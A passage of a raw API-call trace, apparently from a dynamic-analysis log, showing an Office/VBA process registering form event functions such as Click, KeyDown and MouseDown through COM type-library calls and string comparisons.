rgBstrNames=0x6cbdb40, cMaxNames=0x1, pcNames=0x185f0c | out: rgBstrNames=0x6cbdb40*="Click", pcNames=0x185f0c*=0x1) returned 0x0 [0041.919] _wcsicmp (_String1="Click", _String2="Initialize") returned -6 [0041.919] _wcsicmp (_String1="Click", _String2="Resize") returned -15 [0041.919] _wcsicmp (_String1="Click", _String2="QueryClose") returned -14 [0041.919] _wcsicmp (_String1="Click", _String2="Activate") returned 2 [0041.919] _wcsicmp (_String1="Click", _String2="Deactivate") returned -1 [0041.919] _wcsicmp (_String1="Click", _String2="Terminate") returned -17 [0041.919] _wcsicmp (_String1="Click", _String2="Object") returned -12 [0041.919] _wcsicmp (_String1="Click", _String2="Name") returned -11 [0041.919] _wcsicmp (_String1="Click", _String2="Parent") returned -13 [0041.919] _wcsicmp (_String1="Click", _String2="Delete") returned -1 [0041.919] _wcsicmp (_String1="Click", _String2="Index") returned -6 [0041.919] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.919] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x3, pFuncDesc=0x6c1eab8) returned 0x0 [0041.919] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x3, rgszNames=0x6cbdb40*="Click", cNames=0x1) returned 0x0 [0041.919] ITypeInfo:GetMops (in: This=0x6c6be98, memid=-600, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.919] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-600, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x100000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x100000000) returned 0x0 [0041.919] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x3, dwHelpContext=0x1e84c6) returned 0x0 [0041.919] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.919] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x4, ppFuncDesc=0x185de8, pDummy=0xf0015014f | out: ppFuncDesc=0x185de8, pDummy=0xf0015014f) returned 0x0 [0041.919] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34d10 [0041.919] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c34d10) returned 0x10 [0041.919] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-601, rgBstrNames=0x6c34d10, cMaxNames=0x2, pcNames=0x185f0c | out: rgBstrNames=0x6c34d10*="DblClick", pcNames=0x185f0c*=0x2) returned 0x0 [0041.919] _wcsicmp (_String1="DblClick", _String2="Initialize") returned -5 [0041.919] _wcsicmp (_String1="DblClick", _String2="Resize") returned -14 [0041.919] _wcsicmp (_String1="DblClick", _String2="QueryClose") returned -13 [0041.920] _wcsicmp (_String1="DblClick", _String2="Activate") returned 3 [0041.920] _wcsicmp (_String1="DblClick", _String2="Deactivate") returned -3 [0041.920] _wcsicmp (_String1="DblClick", _String2="Terminate") returned -16 [0041.920] _wcsicmp (_String1="DblClick", _String2="Object") returned -11 [0041.920] _wcsicmp (_String1="DblClick", _String2="Name") returned -10 [0041.920] _wcsicmp (_String1="DblClick", _String2="Parent") returned -12 [0041.920] _wcsicmp (_String1="DblClick", _String2="Delete") returned -3 [0041.920] _wcsicmp (_String1="DblClick", _String2="Index") returned -5 [0041.920] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x700, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c050) returned 0x0 [0041.920] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c050, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.920] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c050) returned 0x0 [0041.920] IUnknown:Release (This=0x6c6c050) returned 0x0 [0041.920] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x700, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c050) returned 0x0 [0041.920] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c050, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.920] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c050) returned 0x0 [0041.920] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.920] IUnknown:AddRef (This=0x6c6c050) returned 0x2 [0041.920] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.920] IUnknown:Release (This=0x6c6c050) returned 0x1 [0041.920] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c050, phRefType=0x185c30*=0x186928) returned 0x0 [0041.920] IUnknown:Release (This=0x6c6c050) returned 0x0 [0041.920] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.920] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x4, pFuncDesc=0x6c1eab8) returned 0x0 [0041.920] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x4, rgszNames=0x6c34d10*="DblClick", cNames=0x2) returned 0x0 [0041.920] ITypeInfo:GetMops (in: This=0x6c6be98, memid=-601, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.920] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-601, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000) returned 0x0 [0041.920] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x4, dwHelpContext=0x1e84d0) returned 0x0 [0041.920] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.920] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x5, ppFuncDesc=0x185de8, pDummy=0xcdf03d205ea | out: ppFuncDesc=0x185de8, pDummy=0xcdf03d205ea) returned 0x0 [0041.920] IMalloc:Alloc (This=0x7feffc15380, cb=0x40) returned 0x6b87250 [0041.920] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b87250) returned 0x40 [0041.920] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-608, rgBstrNames=0x6b87250, cMaxNames=0x8, pcNames=0x185f0c | out: rgBstrNames=0x6b87250*="Error", pcNames=0x185f0c*=0x8) returned 0x0 [0041.920] _wcsicmp (_String1="Error", _String2="Initialize") returned -4 [0041.920] _wcsicmp (_String1="Error", _String2="Resize") returned -13 [0041.920] _wcsicmp (_String1="Error", _String2="QueryClose") returned -12 [0041.920] _wcsicmp (_String1="Error", _String2="Activate") returned 4 [0041.921] _wcsicmp (_String1="Error", _String2="Deactivate") returned 1 [0041.921] _wcsicmp (_String1="Error", _String2="Terminate") returned -15 [0041.921] _wcsicmp (_String1="Error", _String2="Object") returned -10 [0041.921] _wcsicmp (_String1="Error", _String2="Name") returned -9 [0041.921] _wcsicmp (_String1="Error", _String2="Parent") returned -11 [0041.921] _wcsicmp (_String1="Error", _String2="Delete") returned 1 [0041.921] _wcsicmp (_String1="Error", _String2="Index") returned -4 [0041.921] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x780, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c418) returned 0x0 [0041.921] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c418, ppTypeAttr=0x185f48, pDummy=0x780 | out: ppTypeAttr=0x185f48, pDummy=0x780) returned 0x0 [0041.921] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c418) returned 0x0 [0041.921] IUnknown:Release (This=0x6c6c418) returned 0x0 [0041.921] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x700, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c050) returned 0x0 [0041.921] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c050, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.921] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c050) returned 0x0 [0041.921] IUnknown:Release (This=0x6c6c050) returned 0x0 [0041.921] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x780, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c418) returned 0x0 [0041.921] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c418, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.921] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c418) returned 0x0 [0041.921] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.921] IUnknown:AddRef (This=0x6c6c418) returned 0x2 [0041.921] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.921] IUnknown:Release (This=0x6c6c418) returned 0x1 [0041.921] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c418, phRefType=0x185c30*=0x8) returned 0x0 [0041.921] IUnknown:Release (This=0x6c6c418) returned 0x0 [0041.921] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x700, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c050) returned 0x0 [0041.921] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c050, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.921] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c050) returned 0x0 [0041.921] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.921] IUnknown:AddRef (This=0x6c6c050) returned 0x2 [0041.921] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.921] IUnknown:Release (This=0x6c6c050) returned 0x1 [0041.921] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c050, phRefType=0x185c30*=0x49) returned 0x0 [0041.921] IUnknown:Release (This=0x6c6c050) returned 0x0 [0041.922] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.922] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x5, pFuncDesc=0x3ea0b88) returned 0x0 [0041.922] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x5, rgszNames=0x6b87250*="Error", cNames=0x8) returned 0x0 [0041.922] ITypeInfo:GetMops (in: This=0x6c6be98, memid=-608, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.922] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-608, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x800000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x800000000) returned 0x0 [0041.922] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x5, dwHelpContext=0x1e84e4) returned 0x0 [0041.922] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.922] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x6, ppFuncDesc=0x185de8, pDummy=0x12f07c30185 | out: ppFuncDesc=0x185de8, pDummy=0x12f07c30185) returned 0x0 [0041.922] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c34d10 [0041.922] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c34d10) returned 0x18 [0041.922] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-602, rgBstrNames=0x6c34d10, cMaxNames=0x3, pcNames=0x185f0c | out: rgBstrNames=0x6c34d10*="KeyDown", pcNames=0x185f0c*=0x3) returned 0x0 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Initialize") returned 2 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Resize") returned -7 [0041.922] _wcsicmp (_String1="KeyDown", _String2="QueryClose") returned -6 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Activate") returned 10 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Deactivate") returned 7 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Terminate") returned -9 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Object") returned -4 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Name") returned -3 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Parent") returned -5 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Delete") returned 7 [0041.922] _wcsicmp (_String1="KeyDown", _String2="Index") returned 2 [0041.922] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x680, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c520) returned 0x0 [0041.922] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c520, ppTypeAttr=0x185f48, pDummy=0x680 | out: ppTypeAttr=0x185f48, pDummy=0x680) returned 0x0 [0041.922] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c520) returned 0x0 [0041.922] IUnknown:Release (This=0x6c6c520) returned 0x0 [0041.922] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x680, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c520) returned 0x0 [0041.922] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c520, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.922] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c520) returned 0x0 [0041.922] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.922] IUnknown:AddRef (This=0x6c6c520) returned 0x2 [0041.922] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.922] IUnknown:Release (This=0x6c6c520) returned 0x1 [0041.922] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c520, phRefType=0x185c30*=0x8) returned 0x0 [0041.922] IUnknown:Release (This=0x6c6c520) returned 0x0 [0041.923] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.923] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x6, pFuncDesc=0x6c1eab8) returned 0x0 [0041.923] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x6, rgszNames=0x6c34d10*="KeyDown", cNames=0x3) returned 0x0 [0041.923] ITypeInfo:GetMops (in: This=0x6c6be98, memid=-602, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.923] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-602, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x300000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x300000000) returned 0x0 [0041.923] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x6, dwHelpContext=0x1e84f8) returned 0x0 [0041.923] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.923] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x7, ppFuncDesc=0x185de8, pDummy=0xce003d205ea | out: ppFuncDesc=0x185de8, pDummy=0xce003d205ea) returned 0x0 [0041.923] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c34d10 [0041.923] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c34d10) returned 0x10 [0041.923] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-603, rgBstrNames=0x6c34d10, cMaxNames=0x2, pcNames=0x185f0c | out: rgBstrNames=0x6c34d10*="KeyPress", pcNames=0x185f0c*=0x2) returned 0x0 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Initialize") returned 2 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Resize") returned -7 [0041.923] _wcsicmp (_String1="KeyPress", _String2="QueryClose") returned -6 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Activate") returned 10 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Deactivate") returned 7 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Terminate") returned -9 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Object") returned -4 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Name") returned -3 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Parent") returned -5 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Delete") returned 7 [0041.923] _wcsicmp (_String1="KeyPress", _String2="Index") returned 2 [0041.923] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x680, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c520) returned 0x0 [0041.923] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c520, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.923] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c520) returned 0x0 [0041.923] IUnknown:Release (This=0x6c6c520) returned 0x0 [0041.923] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x680, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c520) returned 0x0 [0041.923] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c520, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.923] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c520) returned 0x0 [0041.923] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.923] IUnknown:AddRef (This=0x6c6c520) returned 0x2 [0041.923] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.923] IUnknown:Release (This=0x6c6c520) returned 0x1 [0041.923] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c520, phRefType=0x185c30*=0x186928) returned 0x0 [0041.923] IUnknown:Release (This=0x6c6c520) returned 0x0 [0041.924] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.924] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x7, pFuncDesc=0x6c1eab8) returned 0x0 [0041.924] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x7, rgszNames=0x6c34d10*="KeyPress", cNames=0x2) returned 0x0 [0041.924] ITypeInfo:GetMops (in: This=0x6c6be98, memid=-603, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.924] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-603, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x200000000) returned 0x0 [0041.924] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x7, dwHelpContext=0x1e8502) returned 0x0 [0041.924] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.924] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x8, ppFuncDesc=0x185de8, pDummy=0xce103d205ea | out: ppFuncDesc=0x185de8, pDummy=0xce103d205ea) returned 0x0 [0041.924] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c34d10 [0041.924] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c34d10) returned 0x18 [0041.924] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-604, rgBstrNames=0x6c34d10, cMaxNames=0x3, pcNames=0x185f0c | out: rgBstrNames=0x6c34d10*="KeyUp", pcNames=0x185f0c*=0x3) returned 0x0 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Initialize") returned 2 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Resize") returned -7 [0041.924] _wcsicmp (_String1="KeyUp", _String2="QueryClose") returned -6 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Activate") returned 10 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Deactivate") returned 7 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Terminate") returned -9 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Object") returned -4 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Name") returned -3 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Parent") returned -5 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Delete") returned 7 [0041.924] _wcsicmp (_String1="KeyUp", _String2="Index") returned 2 [0041.924] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x680, ppTInfo=0x185e08 | out: ppTInfo=0x185e08*=0x6c6c520) returned 0x0 [0041.924] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c520, ppTypeAttr=0x185f48, pDummy=0x185dc0 | out: ppTypeAttr=0x185f48, pDummy=0x185dc0*=0x185f70) returned 0x0 [0041.924] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c520) returned 0x0 [0041.924] IUnknown:Release (This=0x6c6c520) returned 0x0 [0041.924] ITypeInfo:GetRefTypeInfo (in: This=0x6c6be98, hreftype=0x680, ppTInfo=0x185c28 | out: ppTInfo=0x185c28*=0x6c6c520) returned 0x0 [0041.924] ITypeInfo:RemoteGetTypeAttr (in: This=0x6c6c520, ppTypeAttr=0x185c68, pDummy=0x185c10 | out: ppTypeAttr=0x185c68, pDummy=0x185c10*=0x185c90) returned 0x0 [0041.924] ITypeInfo:LocalReleaseTypeAttr (This=0x6c6c520) returned 0x0 [0041.924] IUnknown:AddRef (This=0x6c6be98) returned 0x4 [0041.924] IUnknown:AddRef (This=0x6c6c520) returned 0x2 [0041.924] IUnknown:Release (This=0x6c6be98) returned 0x3 [0041.924] IUnknown:Release (This=0x6c6c520) returned 0x1 [0041.924] ICreateTypeInfo:AddRefTypeInfo (This=0x6ccf070, pTInfo=0x6c6c520, phRefType=0x185c30*=0x186928) returned 0x0 [0041.924] IUnknown:Release (This=0x6c6c520) returned 0x0 [0041.925] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.925] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x8, pFuncDesc=0x6c1eab8) returned 0x0 [0041.925] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x8, rgszNames=0x6c34d10*="KeyUp", cNames=0x3) returned 0x0 [0041.925] ITypeInfo:GetMops (in: This=0x6c6be98, memid=-604, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.925] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=-604, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x300000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x300000000) returned 0x0 [0041.925] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x8, dwHelpContext=0x1e850c) returned 0x0 [0041.925] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.925] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0x9, ppFuncDesc=0x185de8, pDummy=0xce203d205ea | out: ppFuncDesc=0x185de8, pDummy=0xce203d205ea) returned 0x0 [0041.925] IMalloc:Alloc (This=0x7feffc15380, cb=0x8) returned 0x6cbdb40 [0041.925] IMalloc:GetSize (This=0x7feffc15380, pv=0x6cbdb40) returned 0x8 [0041.925] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=770, rgBstrNames=0x6cbdb40, cMaxNames=0x1, pcNames=0x185f0c | out: rgBstrNames=0x6cbdb40*="Layout", pcNames=0x185f0c*=0x1) returned 0x0 [0041.925] _wcsicmp (_String1="Layout", _String2="Initialize") returned 3 [0041.925] _wcsicmp (_String1="Layout", _String2="Resize") returned -6 [0041.925] _wcsicmp (_String1="Layout", _String2="QueryClose") returned -5 [0041.925] _wcsicmp (_String1="Layout", _String2="Activate") returned 11 [0041.925] _wcsicmp (_String1="Layout", _String2="Deactivate") returned 8 [0041.925] _wcsicmp (_String1="Layout", _String2="Terminate") returned -8 [0041.925] _wcsicmp (_String1="Layout", _String2="Object") returned -3 [0041.925] _wcsicmp (_String1="Layout", _String2="Name") returned -2 [0041.925] _wcsicmp (_String1="Layout", _String2="Parent") returned -4 [0041.925] _wcsicmp (_String1="Layout", _String2="Delete") returned 8 [0041.925] _wcsicmp (_String1="Layout", _String2="Index") returned 3 [0041.925] IUnknown:QueryInterface (in: This=0x6ccf070, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185d80 | out: ppvObject=0x185d80*=0x0) returned 0x80004002 [0041.925] ICreateTypeInfo:AddFuncDesc (This=0x6ccf070, index=0x9, pFuncDesc=0x6c12608) returned 0x0 [0041.925] ICreateTypeInfo:SetFuncAndParamNames (This=0x6ccf070, index=0x9, rgszNames=0x6cbdb40*="Layout", cNames=0x1) returned 0x0 [0041.925] ITypeInfo:GetMops (in: This=0x6c6be98, memid=770, pBstrMops=0x185ee0 | out: pBstrMops=0x185ee0*=0x0) returned 0x0 [0041.925] ITypeInfo:RemoteGetDocumentation (in: This=0x6c6be98, memid=770, refPtrFlags=0x0, pbstrName=0x185e30, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x100000000 | out: pbstrName=0x185e30*=0x0, pBstrDocString=0x185f24, pdwHelpContext=0x0, pBstrHelpFile=0x100000000) returned 0x0 [0041.925] ICreateTypeInfo:SetFuncHelpContext (This=0x6ccf070, index=0x9, dwHelpContext=0x1e8516) returned 0x0 [0041.925] ITypeInfo:LocalReleaseFuncDesc (This=0x6c6be98) returned 0x0 [0041.925] ITypeInfo:RemoteGetFuncDesc (in: This=0x6c6be98, index=0xa, ppFuncDesc=0x185de8, pDummy=0x100015014f | out: ppFuncDesc=0x185de8, pDummy=0x100015014f) returned 0x0 [0041.925] IMalloc:Alloc (This=0x7feffc15380, cb=0x28) returned 0x6bc4250 [0041.925] IMalloc:GetSize (This=0x7feffc15380, pv=0x6bc4250) returned 0x28 [0041.925] ITypeInfo:RemoteGetNames (in: This=0x6c6be98, memid=-605, rgBstrNames=0x6bc4250, cMaxNames=0x5, pcNames=0x185f0c | out: rgBstrNames=0x6bc4250*="MouseDown", pcNames=0x185f0c*=0x5) returned 0x0 [0041.925] _wcsicmp (_String1="MouseDown", _String2="Initialize") returned 4 [0041.925] _wcsicmp (_String1="MouseDown", _String2="Resize") returned -5 [0041.925] _wcsicmp (_String1="MouseDown", _String2="QueryClose") returned -4 [0041.925] _wcsicmp (_String1="MouseDown", _String2="Activate") returned 12 [0041.925] _wcsicmp (_String1="MouseDown", _String2="Deactivate") returned 9 [0041.925] _wcsicmp (_String1="MouseDown", _String2="Terminate") returned -7 [0041.926] _wcsicmp (_String1="MouseDown", _String2="Object") returned -2 [0041.926] _wcsicmp (_String1="MouseDown", _String2="Name") returned -1 [0041.926] 